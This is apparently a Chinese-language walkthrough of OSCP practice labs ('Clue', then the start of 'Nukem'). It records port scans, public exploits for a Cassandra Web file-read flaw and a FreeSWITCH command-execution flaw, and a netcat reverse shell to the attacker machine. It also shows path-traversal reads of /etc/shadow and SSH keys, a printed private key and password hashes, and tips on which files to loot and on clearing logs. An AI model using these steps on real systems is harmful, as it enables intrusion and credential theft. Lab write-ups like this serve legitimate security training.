16|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
1780/tcp open http Apache httpd 2.4.38
18|_http-title: 403 Forbidden
19|_http-server-header: Apache/2.4.38 (Debian)
20139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
21445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
223000/tcp open http Thin httpd
23|_http-title: Cassandra Web
24|_http-server-header: thin
25|_http-trane-info: Problem with XML parsing of /evox/about
26Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
27Device type: general purpose|router
28Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%)
29OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0
30Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%)
31No exact OS matches for host (test conditions non-ideal).
32Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
33
34Host script results:
35| smb-security-mode:
36| account_used: guest
37| authentication_level: user
38| challenge_response: supported
39|_ message_signing: disabled (dangerous, but default)
40| smb-os-discovery:
41| OS: Windows 6.1 (Samba 4.9.5-Debian)
42| Computer name: clue
43| NetBIOS computer name: CLUE\x00
44| Domain name: pg
45| FQDN: clue.pg
46|_ System time: 2025-08-22T03:47:55-04:00
47| smb2-security-mode:
48| 3:1:1:
49|_ Message signing enabled but not required
50| smb2-time:
51| date: 2025-08-22T07:47:54
52|_ start_date: N/A
53|_clock-skew: mean: 1h20m03s, deviation: 2h18m40s, median: 0s
54
55OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
56Nmap done: 1 IP address (1 host up) scanned in 84.87 seconds
57
58┌──(kali㉿kali)-[~]
59└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.133.240
60Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 03:50 EDT
61Nmap scan report for 192.168.133.240
62Host is up (0.27s latency).
63
64PORT STATE SERVICE
6522/tcp open ssh
6680/tcp open http
67|_http-csrf: Couldn't find any CSRF vulnerabilities.'
68|_http-dombased-xss: Couldn't find any DOM based XSS.
69|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
70139/tcp open netbios-ssn
71445/tcp open microsoft-ds
723000/tcp open ppp
73
74Host script results:
75| smb-vuln-regsvc-dos:
76| VULNERABLE:
77| Service regsvc in Microsoft Windows systems vulnerable to denial of service
78| State: VULNERABLE
79| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
80| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
81| while working on smb-enum-sessions.
82|_
83|_smb-vuln-ms10-061: false
84|_smb-vuln-ms10-054: false
85
86Nmap done: 1 IP address (1 host up) scanned in 119.91 seconds
87
88┌──(kali㉿kali)-[~]
89└─$ whatweb http://192.168.133.240:3000/
90http://192.168.133.240:3000/ [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[thin], IP[192.168.133.240], Script, Title[Cassandra Web], X-UA-Compatible[IE=edge]

Cassandra 远程文件读取漏洞

这里Nmap的扫描结果提示了打开80端口提示forbiden，打开3000端口是一个数据库管理的界面Cassandra Web。然后139和445端口是smb协议的端口，还扫出来了一些基本信息，smb协议有很多漏洞，但是这个扫描的结果也提示了 smb-vuln-ms10-061 和 smb-vuln-ms10-054这两个最好用的漏洞不存在。扫描3000端口的目录没有发现有用的信息。

搜索3000端口对应的框架是否有漏洞，发现一个远程文件读取漏洞。

1searchsploit Cassandra
2searchsploit -m linux/webapps/49362.py

1python 49362.py 192.168.133.240 /etc/passwd
2python 49362.py 192.168.133.240 /proc/self/cmdline
3python 49362.py 192.168.133.240 /etc/ssh/sshd_config

用户密码

cassie SecondBiteTheApple330

但是ssh登录失败，也不是另一个用户的密码，还要继续搜索其他的配置文件。

freeswitch命令执行漏洞

官方完整的扫描中是存在8021端口的，这里是扫描漏掉了，所以最好还是用官方给的web kali扫描全部的端口一次，获得最全的端口。一下小节是官方给的Workthrough中的命令

 1# 让我们使用 `smbclient` 来检查一下。
 2smbclient -N -L 192.168.133.240 
 3# `backup` 分享很有趣，让我们登录看看里面有什么
 4smbclient -N //192.168.133.240/backup
 5# 目录名称
 6curl -I http://192.168.133.240/backup/freeswitch
 7curl -I http:/192.168.133.240/backup/freeswitch/etc
 8# 后面官方尝试了上传文件，但是失败，密码错误
 9mkdir backup
10sudo mount -t cifs //192.168.133.240/backup backup/ -o guest
11cd backup/
12# 挂载目录后找密码
13find . -type f -name "*.xml" -exec grep -nH password {} + | wc -l
14find . -type f -name "*.xml" -exec grep -nH password {} + | grep socket

挂上了，但是找到的是默认密码，搜索最新的配置文件会存在那个在哪里。到下面这个网站找到密码会存放在哪里的配置文件里。 https://developer.signalwire.com/freeswitch/FreeSWITCH-Explained/Configuration/Default-Configuration_6587388/#confautoload_configs 其实相对的只要把本地目录换远端目录就行，远端目录用的一定是现在在用的密码。

1python 49362.py 192.168.133.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml

端口和密码

8021 StrongClueConEight021

1searchsploit freeswitch
2searchsploit -m windows/remote/47799.txt
3mv 47799.txt 47799.py
4sed -i -E "s/ClueCon/StrongClueConEight021/g" 47799.py
5python 47799.py 192.168.133.240 whoami
6python 47799.py 192.168.133.240 ls
7python 47799.py 192.168.133.240 "ls /home"

反弹Shell

在cassie文件夹下找到一个id_rsa密钥，但是freeswitch账户没法读，现在可以执行命令的话，把shell弹回来再说。

1rlwrap -cAr nc -nlvp 3000
2python 47799.py 192.168.133.240 "nc -nv 192.168.45.187 3000 -e /bin/bash"
3python3 -c 'import pty;pty.spawn("/bin/bash")'

现在就可以用之前ssh登录失败的cassise账户直接su切换，因为ssh配置文件里写了只允许root和anthony账户登录，但是这两个我们又不知道密码。这个下面的id_rsa利用失败，不知道是谁的ssh密钥文件，尝试了两个账户都失败。然后发现cassise用户可以用sudo的权限有/usr/local/bin/cassandra-web

内网信息收集

 1# 简单来说，这个命令就是用指定的配置启动了 Cassandra Web 管理工具，让用户可以通过 Web 界面管理 Cassandra 数据库
 2# `cassandra - web`工具将以指定的用户名和密码启动，并监听在`0.0.0.0:4444`上，允许远程连接访问其 Web 界面来管理 Cassandra 数据库
 3sudo /usr/local/bin/cassandra-web -B 0.0.0.0:4444 -u cassie -p SecondBiteTheApple330
 4
 5
 6# 另一个shell运行下面命令
 7# 读取敏感信息
 8curl --path-as-is localhost:4444/../../../../../../../../etc/shadow
 9curl --path-as-is localhost:4444/../../../../../../../../home/anthony/.bash_history
10curl --path-as-is localhost:4444/../../../../../../../../home/anthony/.ssh/id_rsa

这样就能得到的密钥文件了，而且这个密钥文件还放到了root文件夹下，也就是说能直接用这个密钥登录root。

 1# 得到密码文件，但是这个长度一般是爆破不开的
 2cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7
 3freeswitch:!:19209
 4
 5anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7
 6# 得到密钥文件
 7-----BEGIN OPENSSH PRIVATE KEY-----
 8b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 9NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
10d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
11jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
12B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
13gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
14DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
15acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
16QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
17mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
18HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
19UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
20etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
21mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
22CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
230hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
24Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
25gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
26krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
27yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
28kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
29DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
30Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
31iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
324oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
33-----END OPENSSH PRIVATE KEY-----

提权root

然后在kali中复制这个密钥，然后直接用密钥登录即可。

1cat > id_rsa
2chmod 600 id_rsa
3ssh -i id_rsa root@192.168.133.240

这里不知道为什么只能root登录而不是Anthony登录，按道理来说应该都能登录的。找到提权后的flag 这里提示smb服务开启，但是没什么用实在是找不到第一个local那个flag在哪里，看了一下官方提示直接find找吧，OSCP的flag命名很规范，直接找名字就行。

1find / -type f -name "local.txt" -print 2>/dev/null
2cat /var/lib/freeswitch/local.txt

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.187]
 B[靶机 
 192.168.133.240]
 C[cassie账户密码]
 D[freeswitch的webshell]
 E[切cassie账户]
 F[root密钥]

 %% 路径关系
 A-->|扫描|B
 B-->|Cassandra远程文件读取漏洞|C
 B-->|freeswitch命令执行漏洞|D
 D-->E
 C-->E
 E-->|Cassandra本地文件读取|F
 

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-22 15:40, 2025-08-22 16:40
 漏洞识别 :a2, after a1, 20m
 
 section 攻击阶段
 初始访问 :b1, after a2, 20m
 权限提升 :crit,b2, after b1, 40m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

有哪些容易泄露配置信息的文件？

在利用文件读取漏洞进行渗透测试时，优先读取以下高价值文件可快速获取关键信息，推动后续攻击链的构建。根据漏洞利用目标和系统环境，推荐按优先级读取以下文件：

🔍 一、系统关键文件（Linux/Unix）

/etc/passwd
- 价值：泄露所有用户账户信息（UID/GID、Shell类型），为暴力破解或权限提升提供目标列表。
- 后续利用：结合弱口令攻击或 suid程序提权。
/etc/shadow
- 价值：存储用户密码哈希（需root权限读取），破解后可获取系统权限。
- 注意：若漏洞权限不足，需结合其他漏洞（如路径遍历）尝试读取。
/etc/group
- 价值：获取用户组信息，识别高权限组（如 sudo、docker），辅助横向移动。

💻 二、应用敏感文件

Web服务器配置
- Nginx/Apache：
  - etc/nginx/nginx.conf、etc/httpd/conf/httpd.conf：获取虚拟主机配置、反向代理规则，发现隐藏服务或内部网络信息。
- 数据库凭据：
  - 如 WEB-INF/web.xml（Java Web应用）、config.php（PHP应用）：泄露数据库连接字符串，直接访问数据库。
环境配置文件
- .env文件：存储API密钥、加密密钥等敏感信息，常见于Node.js/Python应用。
- Kubernetes配置：
  - /var/run/secrets/kubernetes.io/serviceaccount/token：获取Service Account Token，接管K8s集群。

📂 三、动态信息与日志文件

/proc/self/environ
- 价值：暴露进程环境变量（如 PATH、SECRET_KEY），可能包含硬编码凭据或调试信息。
/proc/self/cmdline
- 价值：揭示当前进程启动命令及参数，辅助识别应用框架或配置路径。
系统日志
- /var/log/auth.log（Linux）：查看SSH登录记录，定位管理员IP或爆破痕迹。
- C:\Windows\System32\winevt\Logs\Security.evtx（Windows）：分析安全事件日志。

⚙️ 四、特殊路径与内存文件

临时文件与缓存
- /tmp/、/dev/shm/：查找上传的恶意脚本或缓存数据（如Session文件）。
内核与内存映射
- /proc/kallsyms（需root）：泄露内核函数地址，绕过ASLR防护。
- /dev/mem：直接访问物理内存，提取加密密钥（需高权限）。

🎯 五、针对Java应用的专项读取

WEB-INF/classes/目录
- 价值：读取编译后的 .class文件，反编译获取业务逻辑漏洞（如硬编码密钥）。
WEB-INF/web.xml
- 价值：解析Servlet映射、过滤器配置，发现未授权访问点或安全绕过路径。
JAR/WAR 文件
- 如 lib/application.jar：解压后分析依赖库漏洞（如Log4j）。

🛡️ 防御规避与注意事项

合法性：仅在授权范围内测试，避免读取用户隐私数据。
隐蔽性：
- 清理日志（如覆盖 /var/log/apache2/access.log）。
- 避免频繁请求，触发WAF/IDS告警。
工具辅助：
- 使用 jd-gui反编译 .class文件。
- 通过 pwntools自动化解析内存偏移。

💎 总结：优先级策略

快速突破：/etc/passwd→ /proc/self/environ→ 应用配置文件。
深度渗透：数据库凭据 → 日志文件 → 内核/内存文件。
源码反制：Java .class文件 → 依赖库扫描 → 反编译分析。

find命令的妙用

要高效查找 local.txt文件，需优化 find /命令以避免全盘扫描并提升定位精度。以下是针对性优化方案及命令：

🔍 优化后的查找命令

find / -type f -name "local.txt" -print 2>/dev/null

关键优化点：

限定文件类型：-type f仅搜索普通文件，跳过目录、符号链接等无关项。
精准文件名匹配：-name "local.txt"严格匹配目标文件名，避免模糊搜索的开销。
抑制错误输出：2>/dev/null隐藏权限不足等报错，减少终端干扰。

⚙️ 进阶场景优化

1. 限制搜索深度（减少扫描范围）

find / -maxdepth 3 -type f -name "local.txt" 2>/dev/null

适用场景：已知文件位于顶层目录（如 /etc/、/tmp/）时，通过 -maxdepth 3限制子目录层级，速度提升显著。

2. 组合条件搜索（时间/大小过滤）

# 查找最近7天内修改过的 local.txt
find / -type f -name "local.txt" -mtime -7 2>/dev/null

# 查找大于1KB的 local.txt
find / -type f -name "local.txt" -size +1k 2>/dev/null

适用场景：
- -mtime -7：文件近期被修改过（如渗透测试中的后门文件）。
- -size +1k：排除空文件或小体积缓存文件。

3. 权限/所有者过滤

# 查找属主为 root 的 local.txt
find / -type f -name "local.txt" -user root 2>/dev/null

# 查找权限为644的 local.txt
find / -type f -name "local.txt" -perm 644 2>/dev/null

适用场景：快速定位系统关键文件或配置。

💡 替代方案（更高效率）

使用 `locate`命令（需先更新数据库）：

sudo updatedb # 更新文件数据库（需root权限）
locate local.txt # 秒级检索（依赖定期更新的数据库）

优势：比 find快数十倍，适合频繁搜索固定文件。
注意：新建文件需等待数据库更新（默认每日自动更新）。

⚠️ 注意事项

权限问题：搜索系统目录（如 /etc/、/root/）需 sudo权限，否则结果不全。
性能影响：全盘扫描（find /）可能加重磁盘负载，建议在非高峰时段执行。
精确路径：若已知大致路径（如 /var/log/），直接指定路径而非根目录 /，效率更高。

📊 命令执行效果对比

方法	速度	精度	适用场景
`find / -name "local.txt"`	慢	高	全盘精准搜索
`find / -maxdepth 3 ...`	中	中	限定深度快速扫描
`locate local.txt`	极快	依赖更新	高频检索已知文件

为什么root可以登录成功而Anthony用户无法用密钥登录？

根据 .bash_history记录和测试现象，结合 SSH 密钥认证机制，anthony用户连接失败而 root用户成功的原因可能如下：

⚠️ 核心原因分析

密钥文件权限问题（anthony 用户）
- SSH 要求私钥权限必须为 600，若权限过宽（如 644）会导致客户端拒绝使用私钥。
- 检查 anthony 的私钥权限：
```
ls -l ~/.ssh/id_rsa # 应为 -rw------- (600)
```
  若权限不符，需修复：
```
chmod 600 ~/.ssh/id_rsa
```
.ssh目录或 authorized_keys权限问题（服务器端）
- anthony用户的 .ssh目录权限需为 700，authorized_keys文件权限需为 600。
- 若权限错误（如 authorized_keys为 644），服务器会拒绝认证：
```
# 在服务器上检查 anthony 用户的配置
chmod 700 /home/anthony/.ssh
chmod 600 /home/anthony/.ssh/authorized_keys
```
authorized_keys内容或路径错误
- cp .ssh/id_rsa.pub .ssh/authorized_keys可能未正确覆盖文件（如文件路径错误或内容截断）。
- 验证 authorized_keys内容是否包含完整公钥：
```
cat /home/anthony/.ssh/authorized_keys
```
SSH 服务配置限制
- 服务器可能禁止 anthony用户使用密钥登录（如 sshd_config中设置了 DenyUsers anthony或 PubkeyAuthentication no）。
- 检查服务器配置：
```
grep -E "DenyUsers|PubkeyAuthentication" /etc/ssh/sshd_config
# 确保包含： PubkeyAuthentication yes
```
用户目录所有权或权限问题
- anthony用户目录权限过宽（如 /home/anthony权限为 777）会导致 SSH 拒绝认证。
- 修复目录权限：
```
chmod 755 /home/anthony # 必须 ≤755
```

✅ 为何 `root`用户能成功？

root的 authorized_keys配置正确
- sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys命令直接将公钥复制到 root用户，且 root的 .ssh目录通常自动满足权限要求（700）。
root用户不受某些限制
- sshd_config可能未限制 root登录（如 PermitRootLogin yes），而 anthony用户可能被其他规则阻止。

🔧 解决方案

修复 anthony 用户的权限

客户端（本地）：
```
chmod 600 ~/.ssh/id_rsa
```

服务器端（以 anthony登录或通过 root修复）：

chmod 700 /home/anthony/.ssh
chmod 600 /home/anthony/.ssh/authorized_keys
chmod 755 /home/anthony # 确保目录权限安全

验证 authorized_keys内容

确认公钥完整写入：

echo "$(cat ~/.ssh/id_rsa.pub)" > /home/anthony/.ssh/authorized_keys

检查服务器 SSH 配置

编辑 /etc/ssh/sshd_config：

PubkeyAuthentication yes # 启用密钥认证
AllowUsers anthony root # 允许 anthony 和 root 登录

重启服务生效：

sudo systemctl restart sshd

调试连接

使用 -vvv参数查看详细错误：

ssh -vvv -i id_rsa anthony@192.168.133.240

检查服务器日志：

tail -f /var/log/auth.log # Debian/Ubuntu
tail -f /var/log/secure # RHEL/CentOS

根据您提供的目录信息和 SSH 密钥认证机制，/home/anthony/.ssh/authorized_keys文件缺失会导致 SSH 公钥登录失败。以下是具体分析和解决方案：

⚠️ 无法登录的原因

authorized_keys文件缺失
- 该文件是 SSH 服务器验证客户端公钥的核心依据。服务器会检查客户端提供的公钥是否在 authorized_keys中，若文件不存在，则公钥认证自动失败。
- 您的目录中仅有 id_rsa.pub（公钥）和 id_rsa（私钥），但未将公钥内容添加到 authorized_keys文件中，导致服务器无法匹配私钥。
root用户登录成功的原因
- 您此前执行了 sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys，已将公钥正确复制到 root用户的 authorized_keys文件，因此 root可正常登录。

🔧 解决方案：为 `anthony`用户创建 `authorized_keys`

步骤 1：创建文件并添加公钥内容

# 进入 anthony 的 .ssh 目录
cd /home/anthony/.ssh

# 创建 authorized_keys 文件并将 id_rsa.pub 内容追加到其中
cat id_rsa.pub >> authorized_keys

步骤 2：设置严格的文件权限

# 设置 authorized_keys 权限为 600（仅所有者可读写）
chmod 600 authorized_keys

# 确保 .ssh 目录权限为 700（仅所有者可访问）
chmod 700 /home/anthony/.ssh

权限要求：SSH 要求 authorized_keys权限为 600，.ssh目录权限为 700，否则服务器会拒绝认证。

步骤 3：验证 SSH 配置（可选）

检查 /etc/ssh/sshd_config确保以下配置启用：

PubkeyAuthentication yes # 启用公钥认证
AuthorizedKeysFile .ssh/authorized_keys # 指定公钥文件路径

重启 SSH 服务使配置生效：
```
sudo systemctl restart sshd
```

✅ 验证登录

完成上述步骤后，尝试重新连接：

ssh -i /path/to/id_rsa anthony@192.168.133.240

若仍失败，可通过调试模式定位问题：

ssh -vvv -i /path/to/id_rsa anthony@192.168.133.240

📌 关键注意事项

文件完整性
- authorized_keys中公钥需与客户端私钥严格匹配，复制时避免遗漏字符。
权限安全
- 权限错误是常见失败原因，需确保：
  - authorized_keys→ 600
  - .ssh目录 → 700
  - 私钥 id_rsa→ 600（您已满足）
目录所有权
- 确保 /home/anthony及其子目录所有者是 anthony，否则 SSH 可能拒绝认证：
```
chown -R anthony:anthony /home/anthony
```

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Nukem WP

Wed, 20 Aug 2025 14:22:15 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.159
3# 靶机地址
4192.168.206.105

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.105 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
 9sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
10# 扫描目录
11gobuster dir -e -u http://192.168.206.105 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.236.105/

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Nukem]
 2└─$ echo $ports
 322,80,3306
 4
 5┌──(kali㉿kali)-[~/Desktop/Nukem]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:28 EDT
 8Nmap scan report for 192.168.236.105
 9Host is up (0.32s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 8.3 (protocol 2.0)
 13| ssh-hostkey:
 14| 3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
 15| 256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
 16|_ 256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
 1780/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
 18|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
 193306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
 20Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 21Device type: general purpose|router
 22Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X (97%), MikroTik RouterOS 7.X (89%)
 23OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
 24Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (89%)
 25No exact OS matches for host (test conditions non-ideal).
 26
 27OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 28Nmap done: 1 IP address (1 host up) scanned in 254.79 seconds
 29
 30┌──(kali㉿kali)-[~/Desktop/Nukem]
 31└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
 32Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:36 EDT
 33Nmap scan report for 192.168.236.105
 34Host is up (0.41s latency).
 35
 36PORT STATE SERVICE
 3722/tcp open ssh
 3880/tcp open http
 39|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
 40| http-csrf:
 41| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.105
 42| Found the following possible CSRF vulnerabilities:
 43|
 44| Path: http://192.168.236.105:80/
 45| Form id:
 46| Form action: /
 47|
 48| Path: http://192.168.236.105:80/
 49| Form id:
 50| Form action: /
 51|
 52| Path: http://192.168.236.105:80/index.php/author/admin/
 53| Form id:
 54| Form action: /
 55|
 56| Path: http://192.168.236.105:80/index.php/author/admin/
 57| Form id:
 58| Form action: /
 59|
 60| Path: http://192.168.236.105:80/index.php/student-registration/
 61| Form id:
 62| Form action: /
 63|
 64| Path: http://192.168.236.105:80/index.php/student-registration/
 65| Form id:
 66| Form action: /
 67|
 68| Path: http://192.168.236.105:80/index.php/sample-page/
 69| Form id:
 70| Form action: /
 71|
 72| Path: http://192.168.236.105:80/index.php/sample-page/
 73| Form id:
 74| Form action: /
 75|
 76| Path: http://192.168.236.105:80/index.php/2020/09/
 77| Form id:
 78| Form action: /
 79|
 80| Path: http://192.168.236.105:80/index.php/2020/09/
 81| Form id:
 82| Form action: /
 83|
 84| Path: http://192.168.236.105:80/index.php/instructor-registration/
 85| Form id:
 86| Form action: /
 87|
 88| Path: http://192.168.236.105:80/index.php/instructor-registration/
 89| Form id:
 90| Form action: /
 91|
 92| Path: http://192.168.236.105:80/index.php/category/uncategorized/
 93| Form id:
 94| Form action: /
 95|
 96| Path: http://192.168.236.105:80/index.php/category/uncategorized/
 97| Form id:
 98| Form action: /
 99|
100| Path: http://192.168.236.105:80/wp-login.php
101| Form id: loginform
102| Form action: /wp-login.php
103|
104| Path: http://192.168.236.105:80/index.php/dashboard/
105| Form id:
106| Form action: /
107|
108| Path: http://192.168.236.105:80/?p=6
109| Form id:
110|_ Form action: /
111| http-fileupload-exploiter:
112|
113| Couldn't find a file-type field.
114|
115| Couldn't find a file-type field.
116|
117|_ Couldn't find a file-type field.'
118| http-sql-injection:
119| Possible sqli for queries:
120|_ http://192.168.236.105:80/wp-includes/js/plupload/moxie.min.js?ver=1.3.5%27%20OR%20sqlspider
121|_http-dombased-xss: Couldn't find any DOM based XSS.'
122|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
1233306/tcp open mysql
124
125Nmap done: 1 IP address (1 host up) scanned in 556.05 seconds
126
127┌──(kali㉿kali)-[~/Desktop/Nukem]
128└─$ whatweb http://192.168.236.105/
129http://192.168.236.105/ [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], Email[admin@local.host], HTML5, HTTPServer[Unix][Apache/2.4.46 (Unix) PHP/7.4.10], IP[192.168.236.105], JQuery, MetaGenerator[TutorLMS 1.5.3,WordPress 5.5.1], PHP[7.4.10], Script[text/javascript], Title[Retro Gamming &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[5.5.1], X-Powered-By[PHP/7.4.10]
130
131===============================================================
132http://192.168.206.105/index.php (Status: 301) [Size: 0] [--> http://192.168.206.105/]
133http://192.168.206.105/wp-content (Status: 301) [Size: 242] [--> http://192.168.206.105/wp-content/]
134http://192.168.206.105/wp-login.php (Status: 200) [Size: 6193]
